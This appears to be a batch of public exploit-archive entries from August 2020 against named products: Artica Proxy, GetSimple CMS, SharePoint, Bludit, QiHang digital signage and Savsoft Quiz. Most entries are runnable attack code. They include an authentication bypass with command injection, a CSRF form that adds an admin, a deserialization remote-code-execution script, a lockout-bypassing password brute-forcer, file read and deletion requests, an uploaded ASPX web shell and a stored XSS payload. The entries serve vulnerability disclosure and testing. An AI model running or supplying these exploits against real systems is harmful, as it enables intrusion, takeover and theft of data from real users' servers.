# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-08-13 # Exploit Author: Dan Duffy # Vendor Homepage: http://articatech.net/ # Software Link: http://articatech.net/download2x.php?IsoOnly=yes # Version: 4.30.00000000 (REQUIRED) # Tested on: Debian # CVE : CVE-2020-17506 import requests import argparse from bs4 import BeautifulSoup def bypass_auth(session, args): login_endpoint = "/fw.login.php?apikey=" payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;" print("[+] Bypassing authentication...") session.get(args.host + login_endpoint + payload, verify=False) return session def run_command(session, args): cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command) print("[+] Running command: {}".format(args.command)) response = session.post(args.host + cmd_endpoint, verify=False) soup = BeautifulSoup(response.text, "html.parser") print(soup.find_all("code")[1].get_text()) def main(): parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.") parser.add_argument( "--host", help="The host to target. Format example: https://host:port", ) parser.add_argument("--command", help="The command to run") args = parser.parse_args() if not args.host or not args.command: parser.print_help() exit(0) session = requests.Session() session = bypass_auth(session, args) run_command(session, args) if __name__ == "__main__": main()

# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin) # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: August 2020-08-12 # Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/ # Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip # Version: 1.8.2 # Tested On: Windows 10 Pro + XAMPP # CWE-352: Cross-Site Request Forgery (CSRF) # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site. ## Usage: + Change <IP||DOMAIN> to target IP address or domain name + Change <ADMIN> to target username + Change <PASSWORD> to target password ## CSRF POST Form Method <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST"> <input type="hidden" name="usernamec" value="<ADMIN>" /> <input type="hidden" name="useremail" value="ADMIN&#64;DOMAIN&#46;LOCAL" /> <input type="hidden" name="ntimezone" value="" /> <input type="hidden" name="userlng" value="en&#95;US" /> <input type="hidden" name="userpassword" value="<PASSWORD>" /> <input type="hidden" name="usereditor" value="1" /> <input type="hidden" name="Landing" value="" /> <input type="hidden" name="add&#45;user" value="Add&#32;New&#32;User" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution # Google Dork: inurl:quicklinks.aspx # Date: 2020-08-14 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service # Pack 2, SharePoint Server 2019 # Tested on: Windows 2016 # CVE : CVE-2020-1147 # Credit goes to Steven Seele and Soroush Dalili # Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html #!/usr/bin/python from sys import argv, exit, stdout, stderr import argparse import requests from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth from urllib import quote, unquote import logging class Exploit: # To generate the gadget use: # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command" # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command" gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==' control_path_quicklinks = '/_layouts/15/quicklinks.aspx' control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx' control_path = control_path_quicklinks def __init__( self, redirect=False, proxy_address='', username='', domain='', password='', target='' ): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.username = '%s\\%s' % (domain, username) self.target = target self.password = password self.session = requests.session() self.redirect = redirect self.timeout = 0.5 self.proxies = { 'http': 'http://%s' % proxy_address, 'https': 'http://%s' % proxy_address } \ if proxy_address is not None \ and proxy_address != '' else {} self.headers = {} self.query_params = { 'Mode': "Suggestion" } self.form_values = { '__viewstate': '', '__SUGGESTIONSCACHE__': '' } self.cookies = {} self.payload = """\ <DataSet> <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset"> <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true"> <xs:complexType> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="Exp_x0020_Table"> <xs:complexType> <xs:sequence> <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/> </xs:sequence> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> </xs:element> </xs:schema> <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"> <somedataset> <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted"> <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <ExpandedElement/> <ProjectedProperty0> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType> </MethodParameters> <ObjectInstance xsi:type="LosFormatter"></ObjectInstance> </ProjectedProperty0> </pwn> </Exp_x0020_Table> </somedataset> </diffgr:diffgram> </DataSet>""".replace('{GADGET}', self.gadget) def do_get(self, url, params=None, data=None): return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=data, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def do_post(self, url, data=None, params=None): return self.session.post( url=url, data=data, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def parse_page(self, content): soup = BeautifulSoup(content, 'lxml') for key, val in self.form_values.iteritems(): try: for tag in soup.select('input[name=%s]' % key): try: self.form_values[key] = tag['value'] except Exception as error: stderr.write('error for key %s error %s\n' % (key, str(error))) except Exception as error: stderr.write('error for selector %s error %s\n' % (key, str(error))) return self def debug(self): try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def clean(self, payload): payload = payload\ .replace('\n', '')\ .replace('\r', '') while ' ' in payload: payload = payload\ .replace(' ', ' ') return payload def get_form(self): url = '%s%s' % (self.target, self.control_path) resp = self.do_get(url=url, params=self.query_params) self.parse_page(content=resp.content) return resp def send_payload(self): url = '%s%s' % (self.target, self.control_path) # self.get_form() self.headers['Content-Type'] = 'application/x-www-form-urlencoded' self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload) self.form_values['__viewstate'] = '' resp = self.do_post(url=url, params=self.query_params, data=self.form_values) return resp if __name__ == '__main__': parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit') try: parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ') parser.add_argument('-username', action='store', default='', help='Username to use: first.last') parser.add_argument('-domain', action='store', default='', help='User domain to use: domain.local') parser.add_argument('-password', action='store', default='', help='Password to use: Summer2020') parser.add_argument('-both', action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False') parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False') parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() exp = Exploit( proxy_address=options.proxy, username=options.username, domain=options.domain, password=options.password, target=options.target ) if options.debug: exp.debug() stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % ( options.target, options.username, options.domain, options.password, options.debug, options.proxy )) result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) if 'MicrosoftSharePointTeamServices' in result.headers: stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices']) if options.both and result.status_code != 200: exp.control_path = exp.control_path_quicklinksdialogform stdout.write('Trying alternate page\n') result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) except Exception as error: stderr.write('error in main %s' % str(error))

#!/usr/bin/env ruby ## Title: Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass ## Author: noraj (Alexandre ZANNI) ## Author website: https://pwn.by/noraj/ ## Date: 2020-08-16 ## Vendor Homepage: https://www.bludit.com/ ## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz ## Version: <= 3.9.2 ## Tested on: Bludit Version 3.9.2 # Vulnerability ## Discoverer: Rastating ## Discoverer website: https://rastating.github.io/ ## CVE: CVE-2019-17240 ## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-17240 ## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/ ## Patch: https://github.com/bludit/bludit/pull/1090 require 'httpclient' require 'docopt' # dirty workaround to remove this warning: # Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning. # see https://github.com/nahi/httpclient/issues/252 class WebAgent class Cookie < HTTP::Cookie def domain self.original_domain end end end def get_csrf(client, login_url) res = client.get(login_url) csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0] end def auth_ok?(res) HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location']) end def bruteforce_auth(client, host, username, wordlist) login_url = host + '/admin/login' File.foreach(wordlist).with_index do |password, i| password = password.chomp csrf_token = get_csrf(client, login_url) headers = { 'X-Forwarded-For' => "#{i}-#{password[..4]}", } data = { 'tokenCSRF' => csrf_token, 'username' => username, 'password' => password, } puts "[*] Trying password: #{password}" auth_res = client.post(login_url, data, headers) if auth_ok?(auth_res) puts "\n[+] Password found: #{password}" break end end end doc = <<~DOCOPT Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass Usage: #{__FILE__} -r <url> -u <username> -w <path> [--debug] #{__FILE__} -H | --help Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -u <username>, --user <username> Username of the admin -w <path>, --wordlist <path> Path to the wordlist file --debug Display arguments -H, --help Show this screen Examples: #{__FILE__} -r http://example.org -u admin -w myWordlist.txt #{__FILE__} -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txt DOCOPT begin args = Docopt.docopt(doc) pp args if args['--debug'] clnt = HTTPClient.new bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--wordlist']) rescue Docopt::Exit => e puts e.message end

# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure # Date: 2020-08-12 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.howfor.com # Tested on: Microsoft Windows Server 2012 R2 Datacenter # CVE : N/A QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd. Product web page: http://www.howfor.com Affected version: 3.0.9.0 Summary: Digital Signage Software. Desc: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file '/xml/User/User.xml' and obtain administrative login information that allows for a successful authentication bypass attack. Tested on: Microsoft Windows Server 2012 R2 Datacenter Microsoft Windows Server 2003 Enterprise Edition ASP.NET 4.0.30319 HowFor Web Server/5.6.0.0 Microsoft ASP.NET Web QiHang IIS Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5579 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php 27.07.2020 -- $ curl http://192.168.1.1/xml/User/User.xml <?xml version="1.0" encoding="utf-8"?> <Users> <User id="1" account="admin" password="admin" /> <User id="2" account="dev" password="dev" /> </Users>

# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion # Date: 2020-08-12 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.howfor.com # Tested on: Microsoft Windows Server 2012 R2 Datacenter # CVE : N/A QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd. Product web page: http://www.howfor.com Affected version: 3.0.9.0 Summary: Digital Signage Software. Desc: Input passed to the 'data' parameter in 'QH.aspx' for delete action is not properly sanitised before being used to delete files. This can be exploited by an unauthenticated attacker to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected POST parameter. Tested on: Microsoft Windows Server 2012 R2 Datacenter Microsoft Windows Server 2003 Enterprise Edition ASP.NET 4.0.30319 HowFor Web Server/5.6.0.0 Microsoft ASP.NET Web QiHang IIS Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5580 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5580.php 27.07.2020 -- POST /QH.aspx HTTP/1.1 Host: 192.168.1.74:8090 Content-Length: 105 User-Agent: Eraser X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Origin: http://192.168.1.74:8090 Referer: http://192.168.1.74:8090/index.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close responderId=ResourceNewResponder&action=delete&data=["/opt/resources/Billboard.jpg"]

# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure # Date: 2020-08-12 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.howfor.com # Tested on: Microsoft Windows Server 2012 R2 Datacenter # CVE : N/A QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd. Product web page: http://www.howfor.com Affected version: 3.0.9.0 Summary: Digital Signage Software. Desc: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the 'filename' parameter when using the download action or thru 'path' parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. Tested on: Microsoft Windows Server 2012 R2 Datacenter Microsoft Windows Server 2003 Enterprise Edition ASP.NET 4.0.30319 HowFor Web Server/5.6.0.0 Microsoft ASP.NET Web QiHang IIS Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5581 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php 27.07.2020 -- Source code disclosure PoC: --------------------------- GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1 Host: 192.168.1.74:8090 User-Agent: lfi_test.wrapper/2.9 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close -- HTTP/1.1 200 OK Server: HowFor Web Server/5.6.0.0 Date: Sun, 26 Jul 2020 22:49:08 GMT X-AspNet-Version: 4.0.30319 Content-Disposition: attachment;filename=QH.aspx Set-Cookie: ASP.NET_SessionId=f0xji5cazmbzdygcr5g3qr03; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: application/zip Content-Length: 463 Connection: Close <%@ Page Language="C#" ValidateRequest="false" AutoEventWireup="true" CodeBehind="QH.aspx.cs" Inherits="QiHang.Media.Web.QH" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <title></title> </head> <body> <form id="form1" runat="server"> <div> </div> </form> </body> </html> Arbitrary file read: -------------------- http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=view&fileName=.%2fWeb.config Directory contents disclosure: ------------------------------ POST /QH.aspx HTTP/1.1 Host: 192.168.1.74:8090 Content-Length: 62 User-Agent: lfi_test.wrapper/2.9 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close responderId=ResourceNewResponder&action=getAll&path=&fileName= -- HTTP/1.1 200 OK Server: HowFor Web Server/5.6.0.0 Date: Tue, 28 Jul 2020 23:51:13 GMT X-AspNet-Version: 4.0.30319 Set-Cookie: ASP.NET_SessionId=f0ac1jyifcacvufnpptduv1f; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 4680 Connection: Close { "first": true, "second": [ { "name": "App_Data", "type": "folder", "size": 852992.0, "uploadTime": new Date( 1525316885250 ), "path": "/App_Data" }, { "name": "bin", "type": "folder", "size": 4398172.0, "uploadTime": new Date( 1525316885046 ), ... ... "name": "xml", "type": "folder", "size": 25519.0, "uploadTime": new Date( 1525316885234 ), "path": "/xml" }, { "name": "default.htm", "type": ".htm", "size": 1609.0, "uploadTime": new Date( 1523859040000 ), "path": "/default.htm" }, { "name": "Global.asax", "type": ".asax", "size": 100.0, "uploadTime": new Date( 1523859032000 ), "path": "/Global.asax" }, { "name": "IIS.dll", "type": ".dll", "size": 40960.0, "uploadTime": new Date( 1523859036000 ), ... ... "path": "/Media.Server.DeamonPlugin.Web.xml" }, { "name": "preview.htm", "type": ".htm", "size": 947.0, "uploadTime": new Date( 1523859040000 ), "path": "/preview.htm" }, { "name": "QH.aspx", "type": ".aspx", "size": 463.0, "uploadTime": new Date( 1523859030000 ), "path": "/QH.aspx" }, { "name": "server.xml", "type": ".xml", "size": 206.0, "uploadTime": new Date( 1523859034000 ), "path": "/server.xml" }, { "name": "Web.config", "type": ".config", "size": 2470.0, "uploadTime": new Date( 1523859034000 ), "path": "/Web.config" } ], "third": 0 }

# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated) # Date: 2020-08-12 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.howfor.com # Tested on: Microsoft Windows Server 2012 R2 Datacenter # CVE : N/A <!-- QiHang Media Web (QH.aspx) Digital Signage 3.0.9 (pre-auth) Remote Code Execution Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd. Product web page: http://www.howfor.com Affected version: 3.0.9.0 Summary: Digital Signage Software. Desc: The application suffers from an unauthenticated remote code execution. The vulnerability is caused due to lack of verification when uploading files with QH.aspx that can be written in any location by utilizing the 'remotePath' parameter to traverse through directories. Abusing the upload action and the 'fileToUpload' parameter, an unauthenticated attacker can exploit this to execute system commands by uploading a malicious ASPX script. Tested on: Microsoft Windows Server 2012 R2 Datacenter Microsoft Windows Server 2003 Enterprise Edition ASP.NET 4.0.30319 HowFor Web Server/5.6.0.0 Microsoft ASP.NET Web QiHang IIS Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5582 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5582.php 27.07.2020 --> <html> <body> <script> function uploadShellPoC() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.1.74:8090\/QH.aspx", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr"); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + "Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"cmd.aspx\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x3c%@ Page Language=\"VB\" Debug=\"true\" %\x3e\r\n" + "\x3c%@ import Namespace=\"system.IO\" %\x3e\r\n" + "\x3c%@ import Namespace=\"System.Diagnostics\" %\x3e\r\n" + "\r\n" + "\x3cscript runat=\"server\"\x3e\r\n" + "\r\n" + "Sub RunCmd(Src As Object, E As EventArgs)\r\n" + " Dim myProcess As New Process()\r\n" + " Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)\r\n" + " myProcessStartInfo.UseShellExecute = false\r\n" + " myProcessStartInfo.RedirectStandardOutput = true\r\n" + " myProcess.StartInfo = myProcessStartInfo\r\n" + " myProcessStartInfo.Arguments=xcmd.text\r\n" + " myProcess.Start()\r\n" + "\r\n" + " Dim myStreamReader As StreamReader = myProcess.StandardOutput\r\n" + " Dim myString As String = myStreamReader.Readtoend()\r\n" + " myProcess.Close()\r\n" + " mystring=replace(mystring,\"\x3c\",\"<\")\r\n" + " mystring=replace(mystring,\"\x3e\",\">\")\r\n" + " result.text= vbcrlf & \"\x3cpre\x3e\" & mystring & \"\x3c/pre\x3e\"\r\n" + "End Sub\r\n" + "\r\n" + "\x3c/script\x3e\r\n" + "\r\n" + "\x3chtml\x3e\r\n" + "\x3cbody\x3e\r\n" + "\x3cform runat=\"server\"\x3e\r\n" + "\x3cp\x3e\x3casp:Label id=\"L_p\" runat=\"server\" width=\"80px\"\x3eProgram\x3c/asp:Label\x3e\r\n" + "\x3casp:TextBox id=\"xpath\" runat=\"server\" Width=\"300px\"\x3ec:\\windows\\system32\\cmd.exe\x3c/asp:TextBox\x3e\r\n" + "\x3cp\x3e\x3casp:Label id=\"L_a\" runat=\"server\" width=\"80px\"\x3eArguments\x3c/asp:Label\x3e\r\n" + "\x3casp:TextBox id=\"xcmd\" runat=\"server\" Width=\"300px\" Text=\"/c net user\"\x3e/c net user\x3c/asp:TextBox\x3e\r\n" + "\x3cp\x3e\x3casp:Button id=\"Button\" onclick=\"runcmd\" runat=\"server\" Width=\"100px\" Text=\"Run\"\x3e\x3c/asp:Button\x3e\r\n" + "\x3cp\x3e\x3casp:Label id=\"result\" runat=\"server\"\x3e\x3c/asp:Label\x3e\r\n" + "\x3c/form\x3e\r\n" + "\x3c/body\x3e\r\n" + "\x3c/html\x3e\r\n" + "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "upload\r\n" + "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + "Content-Disposition: form-data; name=\"responderId\"\r\n" + "\r\n" + "ResourceNewResponder\r\n" + "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + "Content-Disposition: form-data; name=\"remotePath\"\r\n" + "\r\n" + "/opt/resources\r\n" + "------WebKitFormBoundaryhbcZX7o0Hw19h3kr--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Click" onclick="uploadShellPoC();" /> </form> </body> </html> <!-- JSON response for successful upload: { "first": true, "second": [ "cmd.aspx" ] } GET request: http://192.168.1.74:8090/opt/resources/cmd.aspx Command issued: /c whoami Response: robertovolare\administrator -->

# Exploit Title: Savsoft Quiz 5 - Stored Cross-Site Scripting # Date: 2020-07-28 # Exploit Author: Mayur Parmar(th3cyb3rc0p) # Vendor Homepage: https://savsoftquiz.com/ # Software Link: https://github.com/savsofts/savsoftquiz_v5.git # Version: 5.0 # Tested on: Windows 10 # Contact: https://www.linkedin.com/in/th3cyb3rc0p/ # CVE: CVE-2020-24609 Stored Cross-site scripting(XSS): Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS. Attack vector: This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: First Name, Last Name Steps for reproduce: 1. Goto registration page 2. fill the details. & put <script>alert("XSS")</script> payload in First name,Last name 3. Now goto Admin Panel.we can see that our payload gets executed. POST /index.php/login/insert_user/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 255 Origin: http://localhost Connection: close Referer: http://localhost/index.php/login/registration/ Cookie: ci_session=d99b121b1213b92a163181fd49c75f667dbce9ea Upgrade-Insecure-Requests: 1 email=hack3r%40gmail.com&password=Hacker%40gmail.com&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E&contact_no=9876543210&gid%5B%5D=1